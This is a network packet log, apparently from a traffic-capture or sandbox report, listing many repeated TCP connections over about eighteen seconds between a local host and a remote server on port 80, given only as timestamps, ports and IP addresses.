                                                                                                                                            Feb 2, 2023 21:17:57.074631929 CET4979080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:57.207984924 CET804978945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:57.208106995 CET4978980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:57.239551067 CET804979045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:57.242623091 CET4979080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:57.243174076 CET4979080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:57.407917976 CET804979045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:57.408180952 CET804979045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:57.461277962 CET4979080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:58.048762083 CET4979080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:58.099267006 CET4979180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:58.213876009 CET804979045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:58.214071989 CET4979080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:58.264149904 CET804979145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:58.265162945 CET4979180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:58.265455008 CET4979180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:58.430489063 CET804979145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:58.430542946 CET804979145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:58.488068104 CET4979180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:58.562077999 CET4979180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:58.591001987 CET4979280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:58.729127884 CET804979145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:58.729278088 CET4979180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:58.758413076 CET804979245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:58.765145063 CET4979280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:58.767972946 CET4979280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:58.935074091 CET804979245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:58.935139894 CET804979245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:58.989806890 CET4979280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:59.554778099 CET4979280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:59.583703995 CET4979380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:59.722083092 CET804979245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:59.722240925 CET4979280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:59.757750034 CET804979345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:59.758025885 CET4979380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:59.758327007 CET4979380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:59.932322979 CET804979345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:59.932435036 CET804979345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:59.982378006 CET4979380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:00.072417974 CET4979380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:00.102148056 CET4979480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:00.246665001 CET804979345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:00.246893883 CET4979380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:00.269922972 CET804979445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:00.270106077 CET4979480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:00.271239996 CET4979480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:00.438872099 CET804979445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:00.439152956 CET804979445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:00.482445002 CET4979480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:00.783174038 CET4979480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:00.813576937 CET4979580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:00.951559067 CET804979445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:00.951643944 CET4979480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:00.981276989 CET804979545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:00.981374025 CET4979580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:00.981710911 CET4979580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:01.148890018 CET804979545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:01.149549961 CET804979545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:01.201096058 CET4979580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:01.274394989 CET4979580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:01.301811934 CET4979680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:01.441884995 CET804979545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:01.442878008 CET4979580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:01.467267990 CET804979645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:01.467374086 CET4979680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:01.468103886 CET4979680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:01.632878065 CET804979645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:01.632934093 CET804979645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:01.685480118 CET4979680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:01.751123905 CET4979680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:01.780934095 CET4979780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:01.915994883 CET804979645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:01.918813944 CET4979680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:01.945955992 CET804979745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:01.946075916 CET4979780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:01.946309090 CET4979780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:02.110858917 CET804979745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:02.110975027 CET804979745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:02.154313087 CET4979780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:02.595144033 CET4979780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:02.634193897 CET4979880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:02.760205984 CET804979745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:02.760504961 CET4979780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:02.799056053 CET804979845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:02.799297094 CET4979880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:02.800074100 CET4979880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:02.964838028 CET804979845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:02.964988947 CET804979845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:03.013783932 CET4979880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:03.081681967 CET4979880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:03.110272884 CET4979980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:03.246980906 CET804979845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:03.248902082 CET4979880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:03.278362989 CET804979945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:03.278733015 CET4979980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:03.279248953 CET4979980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:03.447037935 CET804979945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:03.447101116 CET804979945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:03.498136044 CET4979980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:03.590583086 CET4979980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:03.617800951 CET4980080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:03.758786917 CET804979945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:03.758905888 CET4979980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:03.786024094 CET804980045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:03.786243916 CET4980080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:03.788785934 CET4980080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:03.956890106 CET804980045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:03.957518101 CET804980045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:03.998260975 CET4980080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:04.075495958 CET4980080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:04.103872061 CET4980180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:04.243752956 CET804980045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:04.243891954 CET4980080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:04.271894932 CET804980145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:04.274991035 CET4980180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:04.275414944 CET4980180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:04.443214893 CET804980145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:04.443274975 CET804980145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:04.498337984 CET4980180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:04.714020014 CET4980180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:04.743817091 CET4980280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:04.882276058 CET804980145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:04.884639025 CET4980180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:04.911680937 CET804980245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:04.911998987 CET4980280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:04.912811041 CET4980280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:05.080720901 CET804980245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:05.080797911 CET804980245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:05.123306990 CET4980280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:05.355451107 CET4980280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:05.383183956 CET4980380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:05.523449898 CET804980245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:05.529112101 CET4980280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:05.548463106 CET804980345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:05.553247929 CET4980380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:05.557442904 CET4980380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:05.722428083 CET804980345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:05.722491980 CET804980345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:05.764065027 CET4980380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:06.018143892 CET4980380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:06.055494070 CET4980480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:06.183219910 CET804980345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:06.183315992 CET4980380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:06.220304966 CET804980445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:06.221122026 CET4980480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:06.231604099 CET4980480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:06.396332026 CET804980445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:06.396373034 CET804980445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:06.451647043 CET4980480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:06.501451015 CET4980480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:06.527142048 CET4980580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:06.666435957 CET804980445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:06.666626930 CET4980480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:06.694660902 CET804980545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:06.694802999 CET4980580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:06.695055008 CET4980580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:06.862169981 CET804980545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:06.862205982 CET804980545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:06.904680014 CET4980580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:07.165019989 CET4980580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:07.332770109 CET804980545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:07.332940102 CET4980580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:07.414830923 CET4980680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:07.579520941 CET804980645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:07.579960108 CET4980680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:07.580307961 CET4980680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:07.748111963 CET804980645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:07.748193979 CET804980645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:07.795525074 CET4980680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:07.864574909 CET4980680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:08.029695034 CET804980645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:08.029836893 CET4980680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:08.073194981 CET4980780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:08.241420031 CET804980745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:08.241626024 CET4980780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:08.242496014 CET4980780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:08.410257101 CET804980745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:08.410335064 CET804980745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:08.451756954 CET4980780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:08.517359972 CET4980780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:08.546080112 CET4980880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:08.685379028 CET804980745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:08.685501099 CET4980780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:08.710959911 CET804980845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:08.713429928 CET4980880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:08.715625048 CET4980880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:08.880167961 CET804980845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:08.880453110 CET804980845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:08.920511961 CET4980880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:09.015520096 CET4980880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:09.047249079 CET4980980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:09.180315971 CET804980845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:09.180433035 CET4980880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:09.215061903 CET804980945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:09.217506886 CET4980980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:09.218406916 CET4980980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:09.386295080 CET804980945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:09.386594057 CET804980945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:09.436266899 CET4980980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:09.501321077 CET4980980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:09.528572083 CET4981080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:09.669312954 CET804980945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:09.669605017 CET4980980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:09.693201065 CET804981045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:09.693419933 CET4981080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:09.693608046 CET4981080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:09.859286070 CET804981045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:09.859523058 CET804981045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:09.905088902 CET4981080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:09.973083019 CET4981080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:10.000768900 CET4981180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:10.137773991 CET804981045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:10.137976885 CET4981080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:10.165443897 CET804981145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:10.165591955 CET4981180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:10.165879965 CET4981180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:10.332590103 CET804981145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:10.332652092 CET804981145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:10.373831034 CET4981180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:10.512000084 CET4981180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:10.542958021 CET4981280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:10.685487032 CET804981145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:10.685602903 CET4981180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:10.707834005 CET804981245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:10.707943916 CET4981280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:10.708220959 CET4981280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:10.875111103 CET804981245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:10.875255108 CET804981245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:10.920717955 CET4981280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:10.989646912 CET4981280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:11.028745890 CET4981380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:11.154618025 CET804981245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:11.154755116 CET4981280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:11.193785906 CET804981345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:11.193944931 CET4981380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:11.196955919 CET4981380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:11.364109039 CET804981345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:11.364187002 CET804981345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:11.405092001 CET4981380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:11.472990036 CET4981380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:11.504827023 CET4981480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:11.637934923 CET804981345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:11.638031960 CET4981380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:11.669694901 CET804981445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:11.669917107 CET4981480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:11.670592070 CET4981480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:11.836658955 CET804981445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:11.836743116 CET804981445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:11.889566898 CET4981480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:11.999381065 CET4981480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:12.057301998 CET4981580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:12.164767981 CET804981445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:12.165117025 CET4981480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:12.222378016 CET804981545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:12.225665092 CET4981580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:12.258434057 CET4981580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:12.423362017 CET804981545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:12.423394918 CET804981545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:12.469917059 CET4981580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:12.537051916 CET4981580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:12.605539083 CET4981680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:12.701937914 CET804981545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:12.705847979 CET4981580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:12.770437002 CET804981645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:12.773854017 CET4981680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:12.954328060 CET4981680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:13.119412899 CET804981645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:13.119558096 CET804981645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:13.170861006 CET4981680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:13.465960979 CET4981680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:13.496784925 CET4981780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:13.631110907 CET804981645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:13.631354094 CET4981680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:13.661921024 CET804981745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:13.662164927 CET4981780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:13.662795067 CET4981780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:13.827534914 CET804981745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:13.827615976 CET804981745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:13.874044895 CET4981780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:14.144376993 CET4981780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:14.176202059 CET4981880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:14.309564114 CET804981745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:14.309679985 CET4981780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:14.343852997 CET804981845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:14.343976974 CET4981880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:14.344290018 CET4981880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:14.508994102 CET804981845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:14.509875059 CET804981845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:14.561672926 CET4981880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:14.628422022 CET4981880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:14.657315016 CET4981980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:14.793771029 CET804981845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:14.794035912 CET4981880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:14.822504997 CET804981945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:14.822611094 CET4981980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:14.822953939 CET4981980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:14.987790108 CET804981945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:14.987868071 CET804981945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:15.030440092 CET4981980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:15.330779076 CET4981980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:15.367289066 CET4982080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:15.496037006 CET804981945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:15.496427059 CET4981980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:15.532176971 CET804982045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:15.534120083 CET4982080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:15.534710884 CET4982080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:15.699522972 CET804982045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:15.699664116 CET804982045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:15.749243975 CET4982080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:15.815171003 CET4982080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:15.844712019 CET4982180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:18:15.980398893 CET804982045.61.136.59192.168.2.4
